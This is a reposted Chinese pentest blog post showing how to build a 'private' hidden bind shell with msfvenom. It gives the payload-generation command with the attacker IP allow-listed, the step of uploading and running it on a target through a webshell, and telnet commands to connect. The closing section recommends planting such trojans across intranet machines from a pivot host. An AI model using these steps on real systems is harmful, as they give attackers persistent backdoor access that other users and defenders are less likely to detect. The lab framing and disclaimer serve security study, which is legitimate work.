Msfvenom制作专属Shell

admin 2024年7月15日13:33:01评论9 views字数 640阅读2分8秒阅读模式

文章前言

有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀,本篇文章我们将介绍如何通过Msfvenom来生成用户自己的专属Shell

实验环境

攻击主机:192.168.174.129

目标主机:192.168.174.170

其他主机:192.168.174.173

操作流程

Step 1:实验MSF生成隐藏Bind Shell

msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.174.129 -f exe > hidden_shell.exe

Msfvenom制作专属Shell

Step 2:之后将hidden_shell.exe通过一句话木马或者其他方式上传/下载到目标主机上并执行

Msfvenom制作专属Shell

Step 3:之后查看目标主机本地的8889端口是否开放

Msfvenom制作专属Shell

Step 4:之后使用同网段的其他主机链接该目标主机

telnet 192.168.174.170 8889

Msfvenom制作专属Shell

Step 5:使用攻击主机去链接

telnet 192.168.174.170 8889

Msfvenom制作专属Shell

文末思考

通过制作类似的专属Shell还有一个好处就是当你在内网渗透测试过程中拿下一台跳板机时,你可以利用这台跳板机生成一个正向木马并将其丢到内网的其他机器里面,之后随时可以通过Telnet获取到目标的shell

 推 荐 阅 读

Msfvenom制作专属Shell
Msfvenom制作专属Shell
Msfvenom制作专属Shell

Msfvenom制作专属Shell

Msfvenom制作专属Shell

横向移动之RDP&Desktop Session Hija

原文始发于微信公众号(七芒星实验室):Msfvenom制作专属Shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日13:33:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Msfvenom制作专属Shellhttps://cn-sec.com/archives/2933931.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息